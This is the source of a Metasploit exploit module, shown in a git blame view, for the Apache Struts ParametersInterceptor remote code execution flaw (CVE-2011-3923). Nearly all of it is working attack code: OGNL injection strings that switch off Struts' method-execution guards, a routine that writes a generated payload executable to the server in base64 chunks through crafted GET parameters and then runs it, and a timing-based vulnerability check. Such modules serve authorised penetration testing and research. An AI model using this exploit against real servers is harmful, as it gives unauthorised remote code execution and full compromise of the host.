metasploit-framework/modules/exploits/multi/http/struts_code_exec_parameters.rb

167 lines
6.1 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
2013-08-30 21:28:54 +00:00
Rank = ExcellentRanking
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
2013-08-30 21:28:54 +00:00
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Struts ParametersInterceptor Remote Code Execution',
'Description' => %q{
This module exploits a remote command execution vulnerability in Apache Struts
versions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows
for the use of parentheses which in turn allows it to interpret parameter values as
OGNL expressions during certain exception handling for mismatched data types of
properties which allows remote attackers to execute arbitrary Java code via a
crafted parameter.
},
'Author' =>
[
'Meder Kydyraliev', # Vulnerability Discovery and PoC
'Richard Hicks <scriptmonkey.blog[at]gmail.com>', # Metasploit Module
2014-05-08 21:05:41 +00:00
'mihi', #ARCH_JAVA support
'Christian Mehlmauer' # Metasploit Module
2013-08-30 21:28:54 +00:00
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2011-3923'],
[ 'OSVDB', '78501'],
[ 'URL', 'http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html'],
[ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-009']
],
'Platform' => %w{ java linux win },
2013-08-30 21:28:54 +00:00
'Privileged' => true,
'Targets' =>
[
['Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'windows'
}
],
['Linux Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
],
[ 'Java Universal',
{
'Arch' => ARCH_JAVA,
'Platform' => 'java'
},
]
],
'DisclosureDate' => 'Oct 01 2011',
'DefaultTarget' => 2))
2013-08-30 21:28:54 +00:00
register_options(
[
Opt::RPORT(8080),
2014-05-08 21:05:41 +00:00
OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.','username']),
OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']),
2013-08-30 21:28:54 +00:00
OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])
], self.class)
end
2014-05-08 20:15:52 +00:00
def parameter
datastore['PARAMETER']
end
def execute_command(cmd)
2014-05-09 08:38:19 +00:00
junk = Rex::Text.rand_text_alpha(6)
2014-05-08 20:15:52 +00:00
inject = "(#context[\"xwork.MethodAccessor.denyMethodExecution\"]= new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]"
2014-05-09 08:38:19 +00:00
inject << "= new java.lang.Boolean(true),#{cmd})('#{junk}')"
2014-05-08 20:15:52 +00:00
uri = normalize_uri(datastore['TARGETURI'])
2013-08-30 21:28:54 +00:00
resp = send_request_cgi({
'uri' => uri,
'version' => '1.1',
'method' => 'GET',
2014-05-09 08:38:19 +00:00
'vars_get' => { parameter => inject, "z[(#{parameter})(#{junk})]" => 'true' }
2013-08-30 21:28:54 +00:00
})
2014-05-08 21:05:41 +00:00
resp
2013-08-30 21:28:54 +00:00
end
2013-08-30 21:28:54 +00:00
def exploit
#Set up generic values.
2014-05-08 21:05:41 +00:00
payload_exe = rand_text_alphanumeric(4 + rand(4))
2013-08-30 21:28:54 +00:00
pl_exe = generate_payload_exe
2014-05-08 21:05:41 +00:00
append = false
2013-08-30 21:28:54 +00:00
#Now arch specific...
case target['Platform']
when 'linux'
2014-05-08 21:05:41 +00:00
payload_exe = "/tmp/#{payload_exe}"
chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{payload_exe}\".split(\"_\"))"
exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{payload_exe}\".split(\"_\"))"
2013-08-30 21:28:54 +00:00
when 'java'
2014-05-08 21:05:41 +00:00
payload_exe << ".jar"
2013-08-30 21:28:54 +00:00
pl_exe = payload.encoded_jar.pack
2014-05-08 21:05:41 +00:00
exec_cmd = ''
2013-08-30 21:28:54 +00:00
exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
exec_cmd << "#q.setAccessible(true),#q.set(null,true),"
exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
exec_cmd << "#q.setAccessible(true),#q.set(null,false),"
2014-05-08 21:05:41 +00:00
exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{payload_exe}').toURI().toURL()}),"
2013-08-30 21:28:54 +00:00
exec_cmd << "#c=#cl.loadClass('metasploit.Payload'),"
exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
when 'windows'
2014-05-08 21:05:41 +00:00
payload_exe = "./#{payload_exe}.exe"
exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{payload_exe}')"
2013-08-30 21:28:54 +00:00
else
fail_with(Failure::NoTarget, 'Unsupported target platform!')
end
2013-08-30 21:28:54 +00:00
#Now with all the arch specific stuff set, perform the upload.
#109 = length of command string plus the max length of append.
2014-05-08 21:05:41 +00:00
sub_from_chunk = 109 + payload_exe.length + datastore['TARGETURI'].length + parameter.length
2013-08-30 21:28:54 +00:00
chunk_length = 2048 - sub_from_chunk
2014-05-08 21:05:41 +00:00
chunk_length = ((chunk_length/4).floor) * 3
2013-08-30 21:28:54 +00:00
while pl_exe.length > chunk_length
2014-05-08 21:05:41 +00:00
java_upload_part(pl_exe[0,chunk_length], payload_exe, append)
2013-08-30 21:28:54 +00:00
pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]
append = true
end
2014-05-08 21:05:41 +00:00
java_upload_part(pl_exe, payload_exe, append)
2013-08-30 21:28:54 +00:00
execute_command(chmod_cmd) if target['Platform'] == 'linux'
execute_command(exec_cmd)
2014-05-08 21:05:41 +00:00
register_files_for_cleanup(payload_exe)
2013-08-30 21:28:54 +00:00
end
2014-05-08 21:05:41 +00:00
def java_upload_part(part, filename, append = false)
2013-08-30 21:28:54 +00:00
cmd = ""
cmd << "#f=new java.io.FileOutputStream('#{filename}',#{append}),"
cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),"
cmd << "#f.close()"
execute_command(cmd)
end
2013-08-30 21:28:54 +00:00
def check
sleep_time = datastore['CHECK_SLEEPTIME']
check_cmd = "@java.lang.Thread@sleep(#{sleep_time * 1000})"
t1 = Time.now
vprint_status("Asking remote server to sleep for #{sleep_time} seconds")
2013-08-30 21:28:54 +00:00
response = execute_command(check_cmd)
t2 = Time.now
delta = t2 - t1
2013-08-30 21:28:54 +00:00
if response.nil?
return Exploit::CheckCode::Safe
elsif delta < sleep_time
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Appears
end
end
end